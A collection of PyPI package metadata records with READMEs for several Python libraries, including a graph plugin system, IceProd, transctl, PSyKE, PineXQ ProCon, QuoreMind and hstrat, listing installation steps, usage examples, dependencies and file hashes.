cjm_graph_plugin_system.plugin_interface import ( GraphPlugin ) ``` #### Classes ``` python class GraphPlugin(PluginInterface): "Abstract base class for all Context Graph plugins." def execute( self, action: str = "get_schema", # Action to perform (see docstring for available actions) **kwargs ) -> Dict[str, Any]: # JSON-serializable result "Execute a graph operation. This is the main entry point for RemotePluginProxy. Dispatches to the appropriate method based on `action` parameter. All return values are JSON-serializable dictionaries for HTTP transport." def add_nodes( self, nodes: List[GraphNode] # Nodes to create ) -> List[str]: # Created node IDs "Bulk create nodes." def add_edges( self, edges: List[GraphEdge] # Edges to create ) -> List[str]: # Created edge IDs "Bulk create edges." def get_node( self, node_id: str # UUID of node to retrieve ) -> Optional[GraphNode]: # Node or None if not found "Get a single node by ID." def get_edge( self, edge_id: str # UUID of edge to retrieve ) -> Optional[GraphEdge]: # Edge or None if not found "Get a single edge by ID." def get_context( self, node_id: str, # Starting node UUID depth: int = 1, # Traversal depth (1 = immediate neighbors) filter_labels: Optional[List[str]] = None # Only include nodes with these labels ) -> GraphContext: # Subgraph containing node and its neighborhood "Get the neighborhood of a specific node." def find_nodes_by_source( self, source_ref: SourceRef # External resource reference ) -> List[GraphNode]: # Nodes attached to this source "Find all nodes linked to a specific external resource." def find_nodes_by_label( self, label: str, # Node label to search for limit: int = 100 # Max results ) -> List[GraphNode]: # Matching nodes "Find nodes by label." def update_node( self, node_id: str, # UUID of node to update properties: Dict[str, Any] # Properties to merge/update ) -> bool: # True if successful "Partial update of node properties." def update_edge( self, edge_id: str, # UUID of edge to update properties: Dict[str, Any] # Properties to merge/update ) -> bool: # True if successful "Partial update of edge properties." def delete_nodes( self, node_ids: List[str], # UUIDs of nodes to delete cascade: bool = True # Also delete connected edges ) -> int: # Number of nodes deleted "Delete nodes (and optionally connected edges)." def delete_edges( self, edge_ids: List[str] # UUIDs of edges to delete ) -> int: # Number of edges deleted "Delete edges." def get_schema(self) -> Dict[str, Any]: # Graph schema/ontology """Return the current ontology/schema of the graph.""" ... @abstractmethod def import_graph( self, graph_data: GraphContext, # Data to import merge_strategy: str = "overwrite" # "overwrite", "skip", or "merge" ) -> Dict[str, int]: # Import statistics {nodes_created, edges_created, ...} "Return the current ontology/schema of the graph." def import_graph( self, graph_data: GraphContext, # Data to import merge_strategy: str = "overwrite" # "overwrite", "skip", or "merge" ) -> Dict[str, int]: # Import statistics {nodes_created, edges_created, ...} "Bulk import a GraphContext (e.g., from backup or another plugin)." def export_graph( self, filter_query: Optional[GraphQuery] = None # Optional filter ) -> GraphContext: # Exported subgraph or full graph "Export the entire graph or a filtered subset." ``` ### Segment Slice Specifications (`slices.ipynb`) > Typed slice dataclasses for specifying referenced content regions in > SourceRef #### Import ``` python from cjm_graph_plugin_system.utils.slices import ( SliceSpec, CharSlice, TimestampSlice, FrameSlice, PageSlice, LineSlice, FullContent, parse_slice ) ``` #### Functions ``` python def parse_slice( s: str # Slice string to parse (e.g., "char:0-500", "timestamp:10.5-30.0") ) -> SliceSpec: # Parsed slice specification "Parse a slice string into a typed SliceSpec." ``` #### Classes ``` python @runtime_checkable class SliceSpec(Protocol): "Protocol for typed segment slice specifications." def to_slice_string(self) -> str: # Serialized slice string for SourceRef.segment_slice "Serialize to a slice string." ``` ``` python @dataclass class CharSlice: "Character-range slice for text content." start: int # Start character index (0-indexed) end: int # End character index (exclusive) def to_slice_string(self) -> str: # e.g., "char:0-500" "Serialize to slice string." ``` ``` python @dataclass class TimestampSlice: "Temporal slice for audio/video content." start: float # Start time in seconds end: float # End time in seconds def to_slice_string(self) -> str: # e.g., "timestamp:10.5-30.0" "Serialize to slice string." ``` ``` python @dataclass class FrameSlice: "Frame-range slice for video content." start: int # Start frame number end: int # End frame number def to_slice_string(self) -> str: # e.g., "frame:0-120" "Serialize to slice string." ``` ``` python @dataclass class PageSlice: "Page slice for document content (PDFs, EPUBs)." page: int # Page number (1-indexed) bbox: Optional[str] # Optional bounding box "x1,y1,x2,y2" def to_slice_string(self) -> str: # e.g., "page:3" or "page:3:bbox:10,20,300,400" """Serialize to slice string.""" if self.bbox "Serialize to slice string." ``` ``` python @dataclass class LineSlice: "Line-range slice for code or structured text." start: int # Start line number (0-indexed) end: int # End line number (exclusive) def to_slice_string(self) -> str: # e.g., "line:10-25" "Serialize to slice string." ``` ``` python @dataclass class FullContent: "Reference to complete content (no slicing)." content_type: str = 'text' # Content type: "text", "audio", "image", etc. def to_slice_string(self) -> str: # e.g., "full_text", "full_audio" "Serialize to slice string." ```
text/markdown
Christian J. Mills
9126128+cj-mills@users.noreply.github.com
null
null
Apache Software License 2.0
nbdev jupyter notebook python
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Natural Language :: English", "Programming Language :: Python :: 3.12", "License :: OSI Approved :: Apache Software License" ]
[]
https://github.com/cj-mills/cjm-graph-plugin-system
null
>=3.12
[]
[]
[]
[ "cjm_plugin_system" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.12.12
2026-02-19T22:25:51.960809
cjm_graph_plugin_system-0.0.5.tar.gz
18,635
03/71/2d75a6ef65bf56433a99c85ad755376bd76f7dcdfb0e127535bed7d00ad3/cjm_graph_plugin_system-0.0.5.tar.gz
source
sdist
null
false
83d463b8100d2c9eb52aadcb41c5ccba
e6f68076baac691e18e78da2376164013f74b1861292961ae309f2963cab3e4a
03712d75a6ef65bf56433a99c85ad755376bd76f7dcdfb0e127535bed7d00ad3
null
[]
298
2.4
iceprod
3.2.21
IceCube dataset management system
IceProd ======= .. image:: https://zenodo.org/badge/58235078.svg :target: https://zenodo.org/badge/latestdoi/58235078 IceProd is a Python framework for distributed management of batch jobs. It runs as a layer on top of other batch middleware, such as HTCondor, and can pool together resources from different batch systems. The primary purpose is to coordinate and administer many large sets of jobs at once, keeping a history of the entire job lifecycle. See also: Aartsen, Mark G., et al. "The IceProd framework: Distributed data processing for the IceCube neutrino observatory." Journal of parallel and distributed computing 75 (2015): 198-211. **Note:** For IceCube users with CVMFS access, IceProd is already installed. To load the environment execute:: /cvmfs/icecube.wisc.edu/iceprod/latest/env-shell.sh or:: eval `/cvmfs/icecube.wisc.edu/iceprod/latest/setup.sh` depending on whether you want to get a new shell or load the variables into the current shell. Installation ------------ **Platforms**: IceProd should run on any Unix-like platform, although only Linux has been extensively tested and can be recommented for production deployment. **Prerequisites**: Listed here are any packages outside pip: * Python 3.7+ * MongoDB 3.6+ (for the REST API) * nginx (for ssl offloading and better security) * globus (for data transfer) **Installation**: From the latest release: Get the tarball link from https://github.com/WIPACrepo/iceprod/releases/latest Then install like:: pip install https://github.com/WIPACrepo/iceprod/archive/v2.0.0.tar.gz **Installing from master**: If you must install the dev version from master, do:: pip install --upgrade git+git://github.com/WIPACrepo/iceprod.git#egg=iceprod
text/x-rst
null
WIPAC Developers <developers@icecube.wisc.edu>
null
null
null
WIPAC, batch, workload
[ "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Programming Language :: Python :: 3.14" ]
[]
null
null
<3.15,>=3.12
[]
[]
[]
[ "PyYAML", "asyncache", "boto3<1.36", "cachetools", "certifi", "cryptography", "htcondor>=25.3.1", "httpx", "jsonschema", "ldap3", "prometheus-client", "psutil", "pymongo>=4.13", "python-dateutil", "requests", "requests-futures", "requests-toolbelt", "setproctitle", "tornado", "...
[]
[]
[]
[ "Homepage, https://pypi.org/project/iceprod/", "Tracker, https://github.com/WIPACrepo/iceprod/issues", "Source, https://github.com/WIPACrepo/iceprod" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:25:32.190263
iceprod-3.2.21.tar.gz
6,626,953
78/15/fd84467ff8b248d99ae567257ea7ba7212601667b9fc9eedbc174661bcbd/iceprod-3.2.21.tar.gz
source
sdist
null
false
a9e8d459d6d1cec59a850a9729b2e248
c47294d0e646e2ec5bd22995064565ffdbf827bbaefe87f2c3155b4eb596b53f
7815fd84467ff8b248d99ae567257ea7ba7212601667b9fc9eedbc174661bcbd
MIT
[ "LICENSE" ]
249
2.4
transctl
1.0.2
A command-line tool for managing application localization and generating translations using machine translation services.
# transctl > A pragmatic localization CLI ⚙️ `transctl` is a command-line tool for managing application translation workflows. It scans source files, extracts translatable content, translates it using a configured machine translation provider, and writes translated output files according to your project structure. The tool maintains a local manifest and translation memory to avoid unnecessary retranslations across runs. --- ## Installation Requires **Python ≥ 3.11**. Install from PyPI: ```bash pip install transctl ``` --- ## Quick Start Initialize a configuration file: ```bash transctl init ``` Run the translation workflow: ```bash transctl run ``` That’s the minimal happy path. Use: ```bash transctl --help ``` to explore additional commands. --- ## What It Does `transctl`: - Scans configured resource directories - Extracts translatable content from files - Translates content into one or more target locales - Writes translated output files (never overwrites the source file) - Skips unchanged files using a generated `manifest.json` - Maintains a local SQLite-based translation memory - Supports optional glossary injection - Supports placeholder protection using `{{placeholder}}` syntax --- ## Avoiding Unnecessary Retranslations Two mechanisms are used: ### 1. Translation Manifest (`manifest.json`) After each run, a `manifest.json` file is generated automatically. It tracks file state to skip unchanged files in subsequent runs. If the manifest is deleted or purged, files may be reprocessed. --- ### 2. Local Translation Memory (SQLite) A local SQLite database stores translated segments to prevent repeated translation of identical content across runs. - Automatically created and maintained - Oldest entries may be pruned when the file grows too large - Can be purged manually via `transctl purge` If deleted, memory will rebuild over time. --- ## Configuration The `.transctl.toml` file is required for operation. If `transctl init` is executed and a configuration file already exists, no changes are made. --- ### Example Configuration ```toml [locale] source = "en" targets = [ "fr", ] [engine] provider = "deepl" [resources.html] dirs = [ { path = "templates/*", layout = "along-sided" } ] [resources.json] dirs = [ { path = "locales/[source].*.json"} ] ``` --- ### Locale ```toml [locale] source = "en" targets = ["fr"] ``` - `source` — source language - `targets` — one or more target languages --- ### Engine ```toml [engine] provider = "deepl" ``` Supported providers: - `deepl` - `azure` Engine-specific parameters can be provided interactively or via CLI flags. **Note**: The `auth_key` of all engines must be provided as an environment variable. #### DeepL Required parameters: None Example (non-interactive): ```bash transctl init -y \ -e deepl ``` #### Azure Required parameters: - `region` — Azure resource region Example (non-interactive): ```bash transctl init -y \ -e azure \ --param region=$AZURE_REGION ``` --- ### Resources Resources define what files should be translated. Currently supported: - HTML - JSON Example: ```toml [resources.json] dirs = [ { path = "locales/*", layout = "along-sided" }, ] ``` --- ### Layout Behavior `layout` determines where translated files are written. Allowed values: - `along-sided` - `by-language` If omitted, the default behavior is equivalent to `along-sided`. Note that `layout=""` is not valid and will result in an error. #### along-sided If the original file is: ``` i18n.json ``` The translated file becomes: ``` fr_i18n.json ``` --- #### by-language Keeps the original filename but creates a language directory: ``` locales/en/i18n.json → locales/fr/i18n.json ``` --- ## Placeholder Protection To prevent specific content from being translated, wrap it in: ``` {{placeholder}} ``` Anything inside `{{}}` is preserved. --- ## Glossary Support A glossary file can be provided as a simple JSON key-value mapping. Example: ```json { "Key": "Value" } ```
text/markdown
null
null
null
null
null
null
[]
[]
null
null
>=3.11
[]
[]
[]
[ "click~=8.3.1", "deepl~=1.27.0", "pydantic~=2.12.5", "click~=8.3.1", "bs4~=0.0.2", "beautifulsoup4~=4.14.3", "tomli~=2.4.0", "typing_extensions~=4.15.0", "tomli_w~=1.2.0", "SQLAlchemy~=2.0.46", "azure-ai-translation-text~=1.0.1", "json5~=0.13.0", "pytest; extra == \"dev\"", "ruff; extra ==...
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:24:52.518292
transctl-1.0.2.tar.gz
33,296
3e/3e/28111347eced139959e902e50e3c1d72ae0dd85a656c2601f3eda0491685/transctl-1.0.2.tar.gz
source
sdist
null
false
406d4395a6f5f24c99e2d7fafa261ed3
0487be10086eef0e32964f118ef0b57d7077db1e2156c4bd9e360afde7f72c9f
3e3e28111347eced139959e902e50e3c1d72ae0dd85a656c2601f3eda0491685
null
[ "LICENSE" ]
236
2.4
psyke
1.0.4.dev24
Python-based implementation of PSyKE, i.e. a Platform for Symbolic Knowledge Extraction
# PSyKE ![PSyKE Logo](.img/logo-wide.png) Quick links: * [Home Page](https://apice.unibo.it/xwiki/bin/view/PSyKE/) * [GitHub Repository](https://github.com/psykei/psyke-python) * [PyPi Repository](https://pypi.org/project/psyke/) * [Issues](https://github.com/psykei/psyke-python/issues) ## Latest Releases * PSyKE 1.0: Compatibility with Python 3.11.x * PSyKE 0.10: New genetic algorithms for knowledge extraction * PSyKE 0.9: Fairness mitigation support for knowedge extractors * PSyKE 0.8: New features: local explainability and counterfactual support * PSyKE 0.7: New SKE algorithms implemented ## Intro [PSyKE](https://apice.unibo.it/xwiki/bin/view/PSyKE/) (Platform for Symbolic Knowledge Extraction) is intended as a library for extracting symbolic knowledge (in the form of logic rule lists) out of sub-symbolic predictors. More precisely, PSyKE offers a general purpose API for knowledge extraction, and a number of different algorithms implementing it, supporting both classification and regression problems. The extracted knowledge consists of a Prolog theory (i.e., a list of Horn clauses) or an OWL ontology containing SWRL rules. PSyKE relies on [2ppy](https://github.com/tuProlog/2ppy) (tuProlog in Python) for logic support, which in turn is based on the [2p-Kt](https://github.com/tuProlog/2p-kt) logic ecosystem. ### Class diagram overview: ![PSyKE class diagram](http://www.plantuml.com/plantuml/svg/PLBBRkem4DtdAqQixeLcqsN40aHfLQch2dM341gS0IpoY3oJYfJctnl7RkgcKZRdCUFZ4ozOq4YTPr65we8dWlkgQcuHmEPCfMbW6iDaEe5LXZLJr4QHof3PgxVMGoTtS5XJSNCXkwVxlhdUguzQeUYoi28u3bxNovS0RWnLM7H46mNZXaw6c4UZpq8cW4z6ftGTZoeq4WwjB6x7BbPdoZ7qFMXMXeGU2QKsv2I06HmTiIymfmHOpA1WccjcVSXe_uvPJPn0gfLiEyyTl5bcrtk7qzTNCQYaDBxhyQ6_BFFFEExJ_sLzXoFMLpdcVMrZrhVNvS83zygFmrv-1fMXL5lOezH5rH_z7qqWqonRbn-72-nwAxaz_r8KP9B_YNz3uTP0jFcmAt6xB9gT3UJSC8_Z87G2PIrLBL0UemKLQPrdNm00) <!-- To generate/edit the class diagram browse the URL above, after replacing `svg` with `uml` --> PSyKE is designed around the notion of _extractor_. More precisely, an `Extractor` is any object capable of extracting a logic `Theory` out of a trained sub-symbolic regressor or classifier. Accordingly, an `Extractor` is composed of _(i)_ a trained predictor (i.e., black-box used as an oracle) and _(ii)_ a set of feature descriptors, and it provides two methods: * `extract`: returns a logic theory given a dataset; * `predict`: predicts a value using the extracted rules (instead of the original predictor). Currently, the supported extraction algorithms are: * [CART](https://doi.org/10.1201/9781315139470), straightforward extracts rules from both classification and regression decision trees; * Classification: * [REAL](http://dx.doi.org/10.1016/B978-1-55860-335-6.50013-1) (Rule Extraction As Learning), generates and generalizes rules strarting from dataset samples; * [Trepan](http://dx.doi.org/10.1016/B978-1-55860-335-6.50013-1), generates rules by inducing a decision tree and possibly exploiting m-of-n expressions; * Regression: * [ITER](http://dx.doi.org/10.1007/11823728_26), builds and iteratively expands hypercubes in the input space. Each cube holds a constant value, that is the estimated output for the samples inside the cube; * [GridEx](http://dx.doi.org/10.1007/978-3-030-82017-6_2), extension of the ITER algorithm that produces shorter rule lists retaining higher fidelity w.r.t. the predictor. * GridREx, extension of GridEx where the output of each hypercube is a linear combination of the input variables and not a constant value. Users may exploit the PEDRO algorithm, included in PSyKE, to tune the optimal values for GridEx and GridREx hyper-parameters. We are working on PSyKE to extend its features to encompass explainable clustering tasks, as well as to make more general-purpose the supported extraction algorithms (e.g., by adding classification support to GridEx and GridREx). ## Users ### End users PSyKE is deployed as a library on Pypi. It can be installed as Python package by running: ```bash pip install psyke ``` #### Requirements Please refer to the [requirements file](https://github.com/psykei/psyke-python/blob/master/requirements.txt) ##### Test requirements * `skl2onnx` * `onnxruntime` * `parameterized` Once installed, it is possible to create an extractor from a predictor (e.g. Neural Network, Support Vector Machine, K-Nearest Neighbours, Random Forest, etc.) and from the data set used to train the predictor. > **Note:** the predictor must expose a method named `predict` to be properly used as an oracle. #### End users A brief example is presented in `demo.py` script in the `demo/` folder. Using `sklearn`'s Iris data set we train a K-Nearest Neighbours to predict the correct output class. Before training, we make the dataset discrete. After that we create two different extractors: REAL and Trepan. We output the extracted theory for both extractors. REAL extracted rules: ``` iris(PetalLength, PetalWidth, SepalLength, SepalWidth, setosa) :- PetalWidth =< 1.0. iris(PetalLength1, PetalWidth1, SepalLength1, SepalWidth1, versicolor) :- PetalLength1 > 4.9, SepalWidth1 in [2.9, 3.2]. iris(PetalLength2, PetalWidth2, SepalLength2, SepalWidth2, versicolor) :- PetalWidth2 > 1.6. iris(PetalLength3, PetalWidth3, SepalLength3, SepalWidth3, virginica) :- SepalWidth3 =< 2.9. iris(PetalLength4, PetalWidth4, SepalLength4, SepalWidth4, virginica) :- SepalLength4 in [5.4, 6.3]. iris(PetalLength5, PetalWidth5, SepalLength5, SepalWidth5, virginica) :- PetalWidth5 in [1.0, 1.6]. ``` Trepan extracted rules: ``` iris(PetalLength6, PetalWidth6, SepalLength6, SepalWidth6, virginica) :- PetalLength6 > 3.0, PetalLength6 in [3.0, 4.9]. iris(PetalLength7, PetalWidth7, SepalLength7, SepalWidth7, versicolor) :- PetalLength7 > 3.0. iris(PetalLength8, PetalWidth8, SepalLength8, SepalWidth8, setosa) :- true. ``` ## Developers Working with PSyKE codebase requires a number of tools to be installed: * Python 3.11 + Python version >= `3.12.x` are currently __not__ supported * JDK 11+ (please ensure the `JAVA_HOME` environment variable is properly configured) * Git 2.20+ ### Develop PSyKE with PyCharm To participate in the development of PSyKE, we suggest the [PyCharm](https://www.jetbrains.com/pycharm/) IDE. #### Importing the project 1. Clone this repository in a folder of your preference using `git_clone` appropriately 2. Open PyCharm 3. Select `Open` 4. Navigate your file system and find the folder where you cloned the repository 5. Click `Open` ### Developing the project Contributions to this project are welcome. Just some rules: * We use [git flow](https://github.com/nvie/gitflow), so if you write new features, please do so in a separate `feature/` branch * We recommend forking the project, developing your code, then contributing back via pull request * Commit often * Stay in sync with the `develop` (or `master`) branch (pull frequently if the build passes) * Do not introduce low quality or untested code #### Issue tracking If you meet some problems in using or developing PSyKE, you are encouraged to signal it through the project ["Issues" section](https://github.com/psykei/psyke-python/issues) on GitHub.
text/markdown
Matteo Magnini
matteo.magnini@unibo.it
null
null
Apache 2.0 License
knowledge extraction, symbolic ai, ske, extractor, rules, prolog
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "Topic :: Software Development :: Libraries", "Topic :: Scientific/Engineering :: Artificial Intelligence", "License :: OSI Approved :: Apache Software License", "Programming Language :: Python :: 3", "Programming Language :: Python :...
[ "Independant" ]
https://github.com/psykei/psyke-python
null
==3.11
[]
[]
[]
[ "numpy~=2.3.4", "pandas~=3.0.0", "scikit-learn~=1.8.0", "2ppy~=0.4.0", "kneed~=0.8.1", "sympy~=1.11" ]
[]
[]
[]
[ "Bug Reports, https://github.com/psykei/psyke-python/issues", "Source, https://github.com/psykei/psyke-python" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T22:24:49.400660
psyke-1.0.4.dev24.tar.gz
74,341
0d/16/00979c6ec69562d0a8cb5830f99751b0170fb56e63ac2f3ac5c214bc6e9a/psyke-1.0.4.dev24.tar.gz
source
sdist
null
false
66201efd9e83f434019c4a9673a83093
90cc807af110ca5d2378abb4fc67a85b4fc9e3bff1dfb5d00044bf732a2fef10
0d1600979c6ec69562d0a8cb5830f99751b0170fb56e63ac2f3ac5c214bc6e9a
null
[ "LICENSE" ]
215
2.3
pinexq-procon
2.5.1
Framework to create containers for DataCybernetic's PineXQ computing platform
# PineXQ ProCon Framework Computations in DC-Cloud are done by **Workers** running inside a **ProcessingContainer**, or short "ProCon", which is also the name of the framework. ProCon provides an unobtrusive wrapper around function definitions without introducing new semantics, allowing for a clean definition of the computational task, while handling all cloud-related communication and data-management transparently in the background. This removes the code and configuration required from the function implementation. ### Installation To install the package use the `pip` command, to either install from a package feed: ``` pip install pinexq-procon ``` ### Creating a container To publish a function in a container it has to be a method of a class inheriting from the `Step` class. ```python from pinexq.procon.step import Step # import package class MyStepCollection(Step): # define the container class def calculate_square(self, x: float) -> float: # define a step function """Calculate the square of x :param x: a float number :returns: the square of x """ return x ** 2 # More step functions can go in the same class if __name__ == '__main__': # add script guard MyStepCollection() # run the container - this will spawn the cli ``` It is mandatory to annotate the types of parameters and return value. Docstrings are optional, but highly recommended. The [documentation](doc/ProCon.md) has a detailed section about [implementing processing-steps](doc/Implementing-a-Step.md). ### Running a Step-function locally The Python file with the container is itself a cli-tool. You get a list of all available commands with the `--help` parameter. ``` python ./my_step_file.py --help ``` With the `run` option you can call a function in the container directly and the result is written to the console. ``` python ./my_step_file.py run --function calculate_square --parameters "{'x': 5}" 25 ``` You can find full list of available commands in the [cli documentation](doc/Using-Procon-From-Cli.md). All possible parameters and environment variables are listed [here](doc/Parameters.md).
text/markdown
Sebastian Höfer, Carsten Blank, Mathias Reichardt
Sebastian Höfer <hoefer@data-cybernetics.com>, Carsten Blank <blank@data-cybernetics.com>, Mathias Reichardt <reichardt@data-cybernetics.com>
null
null
Copyright (C) data cybernetics ssc GmbH - All Rights Reserved <contactus@data-cybernetics.com>, December 2023
null
[]
[]
null
null
>=3.11
[]
[]
[]
[ "aio-pika==9.5.5", "click>=8.1.3", "docstring-parser==0.*", "httpx-caching>=0.1a4", "httpx==0.*", "pinexq-client>=1.0.0", "pydantic>=2.10.0", "pyjwt>=2.10.0", "rich>=13.3.2", "stamina>=24.2.0" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.13.9
2026-02-19T22:24:11.607671
pinexq_procon-2.5.1-py3-none-any.whl
57,816
06/ff/ff7f333838f3e9cfb2d711c624ac6f89fd65ca0bb4495fd8077fc4b6d280/pinexq_procon-2.5.1-py3-none-any.whl
py3
bdist_wheel
null
false
f1222bb986b5745d4d887d08d53c47bf
84f8a896330b38aeebb245acfec1d84517179cf65f34d6a21be4c0ed04020a91
06ffff7f333838f3e9cfb2d711c624ac6f89fd65ca0bb4495fd8077fc4b6d280
null
[]
98
2.4
quoremind
1.0.0
QuoreMind: Sistema Metripléctico Cuántico-Bayesiano
# QuoreMind v1.0.0 ### Sistema Metripléctico Cuántico-Bayesiano QuoreMind es un framework de lógica bayesiana avanzado que integra estructuras metriplécticas y operadores cuánticos para el modelado de sistemas de información dinámicos. Diseñado bajo el rigor de **El Mandato Metriplético**, el sistema garantiza estabilidad numérica y coherencia física mediante la competencia entre términos conservativos y disipativos. ## 🌌 Fundamentos Físicos Siguiendo el "Mandato Metriplético", QuoreMind define explícitamente la dinámica del sistema mediante dos corchetes ortogonales: 1. **Componente Simpléctica**: Generada por un Hamiltoniano $H$ (Energía) para movimientos reversibles. * `d_symp = {u, H}` (Estructura de Poisson). 2. **Componente Métrica**: Generada por un Potencial de Disipación $S$ (Entropía) para relajación funcional. * `d_metr = [u, S]` (Potencial disipativo). ### Ecuación Maestra de Evolución $$ \frac{df}{dt} = \{f, H\} + [f, S]_M $$ Donde $\{, \}$ representa el corchete de Poisson y $[, ]_M$ representa la interacción métrica disipativa mediada por la matriz métrica $M$. ## 🛠️ Características Principales * **Estructura Metripléctica**: Simulación de evolución temporal combinando entropía y energía. * **Operador Áureo ($O_n$)**: Modulación de fase cuasiperiódica mediante la razón áurea ($\phi \approx 1.618$) para evitar singularidades y estructurar el vacío de información. * **Pre-Análisis de Mahalanobis**: Uso de la distancia de Mahalanobis vectorizada para evaluar la consistencia de estados cuánticos. * **Lógica Bayesiana Cuántica**: Motor de inferencia para el cálculo de probabilidades posteriores $P(A|B)$ sobre estados colapsados. * **Optimización Adam (NumPy Puro)**: Algoritmo de optimización de primer orden implementado sin dependencias externas pesadas (TensorFlow/PyTorch). ## 🧬 Analogía Rigurosa QuoreMind implementa el **Nivel 3 de Isomorfismo Físico Operacional**, permitiendo la transferencia de intuición entre: * **Dinámica de Fluidos**: Viscosidad e Inercia. * **Información Cuántica**: Decoherencia (Lindblad) y Dinámica Unitaria (Schrödinger). ## 🚀 Instalación y Uso ### Instalación Puedes instalar QuoreMind directamente desde el código fuente o mediante pip una vez publicado: ```bash pip install quoremind ``` Para desarrollo local: ```bash git clone https://github.com/jacobotmr/quoremind.git cd quoremind pip install -e . ``` ### Uso como Framework Ahora puedes importar los componentes de QuoreMind en tus propios proyectos: ```python from quoremind import QuantumNoiseCollapse, run_quoremind_simulation # Ejecutar una simulación rápida results = run_quoremind_simulation( prn_influence=0.72, learning_rate=0.01, target_state=[1, 6, 6, 1] ) ``` ### Interfaz de Línea de Comandos (CLI) QuoreMind incluye una herramienta de CLI para ejecutar simulaciones rápidamente: ```bash quoremind --prn 0.72 --lr 0.01 --iterations 100 --target 1 6 ``` ## 🧪 Verificación (Pytest) La integridad del sistema se valida mediante pruebas de reversibilidad y límites asintóticos: ```bash pytest tests/ ``` --- **Autor:** Jacobo Tlacaelel Mina Rodriguez. **Diseño:** Basado en principios de simetría estructural y física teórica.
text/markdown
null
Jacobo Tlacaelel Mina Rodriguez <jako@example.com>
null
null
null
null
[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent" ]
[]
null
null
>=3.8
[]
[]
[]
[ "numpy", "scipy" ]
[]
[]
[]
[ "Homepage, https://github.com/jacobotmr/quoremind", "Bug Tracker, https://github.com/jacobotmr/quoremind/issues" ]
twine/6.2.0 CPython/3.12.7
2026-02-19T22:23:22.706700
quoremind-1.0.0.tar.gz
17,016
4d/e5/d7ece81acef866d7cdb4f5b1d63a016460a3f87e6688e0a495459865f51a/quoremind-1.0.0.tar.gz
source
sdist
null
false
22ee393df279b9bbfdbfcb278bcbebf2
4b4defc19c8f4a3825de9788f37af39894156f5aee9daaf1c4f2c343a5ed4963
4de5d7ece81acef866d7cdb4f5b1d63a016460a3f87e6688e0a495459865f51a
null
[ "LICENSE" ]
350
2.2
hstrat
1.20.28
hstrat enables phylogenetic inference on distributed digital evolution populations
![hstrat wordmark](docs/assets/hstrat-wordmark.png) [ ![PyPi](https://img.shields.io/pypi/v/hstrat.svg) ](https://pypi.python.org/pypi/hstrat) [ ![codecov](https://codecov.io/gh/mmore500/hstrat/branch/master/graph/badge.svg?token=JwMfFOpBBD) ](https://codecov.io/gh/mmore500/hstrat) [ ![Codacy Badge](https://app.codacy.com/project/badge/Grade/9ab14d415aa9458d97b4cf760b95f874) ](https://www.codacy.com/gh/mmore500/hstrat/dashboard) [ ![CI](https://github.com/mmore500/hstrat/actions/workflows/ci.yaml/badge.svg) ](https://github.com/mmore500/hstrat/actions) [ ![Read The Docs](https://readthedocs.org/projects/hstrat/badge/?version=latest) ](https://hstrat.readthedocs.io/en/latest/?badge=latest) [ ![GitHub stars](https://img.shields.io/github/stars/mmore500/hstrat.svg?style=round-square&logo=github&label=Stars&logoColor=white)](https://github.com/mmore500/hstrat) [ ![Zenodo](https://zenodo.org/badge/464531144.svg) ](https://zenodo.org/badge/latestdoi/464531144) [![JOSS](https://joss.theoj.org/papers/10.21105/joss.04866/status.svg)](https://doi.org/10.21105/joss.04866) _hstrat_ enables phylogenetic inference on distributed digital evolution populations - Free software: MIT license - Documentation: <https://hstrat.readthedocs.io> - Repository: <https://github.com/mmore500/hstrat> ## Install `python3 -m pip install hstrat` A containerized release of `hstrat` is available via [ghcr.io](https://ghcr.io/mmore500/hstrat) ```bash singularity exec docker://ghcr.io/mmore500/hstrat:v1.20.28 python3 -m hstrat --help ``` ## Features _hstrat_ serves to enable **robust, efficient extraction of evolutionary history** from evolutionary simulations where centralized, direct phylogenetic tracking is not feasible. Namely, in large-scale, **decentralized parallel/distributed evolutionary simulations**, where agents' evolutionary lineages migrate among many cooperating processors over the course of simulation. _hstrat_ can - accurately estimate **time since MRCA** among two or several digital agents, even for uneven branch lengths - **reconstruct phylogenetic trees** for entire populations of evolving digital agents - **serialize genome annotations** to/from text and binary formats - provide **low-footprint** genome annotations (e.g., reasonably as low as **64 bits** each) - be directly configured to satisfy **memory use limits** and/or **inference accuracy requirements** _hstrat operates just as well in single-processor simulation, but direct phylogenetic tracking using a tool like [phylotrackpy](https://github.com/emilydolson/phylotrackpy/) should usually be preferred in such cases due to its capability for perfect record-keeping given centralized global simulation observability._ ## Example Usage This code briefly demonstrates, 1. initialization of a population of `HereditaryStratigraphicColumn` of objects, 2. generation-to-generation transmission of `HereditaryStratigraphicColumn` objects with simple synchronous turnover, and then 3. reconstruction of phylogenetic history from the final population of `HereditaryStratigraphicColumn` objects. ```python3 from random import choice as rchoice import alifedata_phyloinformatics_convert as apc from hstrat import hstrat; print(f"{hstrat.__version__=}") # when last ran? from hstrat._auxiliary_lib import seed_random; seed_random(1) # reproducibility # initialize a small population of hstrat instrumentation # (in full simulations, each column would be attached to an individual genome) population = [hstrat.HereditaryStratigraphicColumn() for __ in range(5)] # evolve population for 40 generations under drift for _generation in range(40): population = [rchoice(population).CloneDescendant() for __ in population] # reconstruct estimate of phylogenetic history alifestd_df = hstrat.build_tree(population, version_pin=hstrat.__version__) tree_ascii = apc.RosettaTree(alifestd_df).as_dendropy.as_ascii_plot(width=20) print(tree_ascii) ``` ``` hstrat.__version__='1.8.8' /--- 1 /---+ /--+ \--- 3 | | /---+ \------- 2 | | +--+ \---------- 0 | \-------------- 4 ``` In [actual usage](https://hstrat.readthedocs.io/en/latest/demo-ping.html), each _hstrat_ column would be bundled with underlying genetic material of interest in the simulation --- entire genomes or, in systems with sexual recombination, individual genes. The _hstrat_ columns are designed to operate as a neutral genetic annotation, enhancing observability of the simulation but not affecting its outcome. ## How it Works In order to enable phylogenetic inference over fully-distributed evolutionary simulation, hereditary stratigraphy adopts a paradigm akin to phylogenetic work in natural history/biology. In these fields, phylogenetic history is inferred through comparisons among genetic material of extant organisms, with --- in broad terms --- phylogenetic relatedness established through the extent of genetic similarity between organisms. Phylogenetic tracking through _hstrat_, similarly, is achieved through analysis 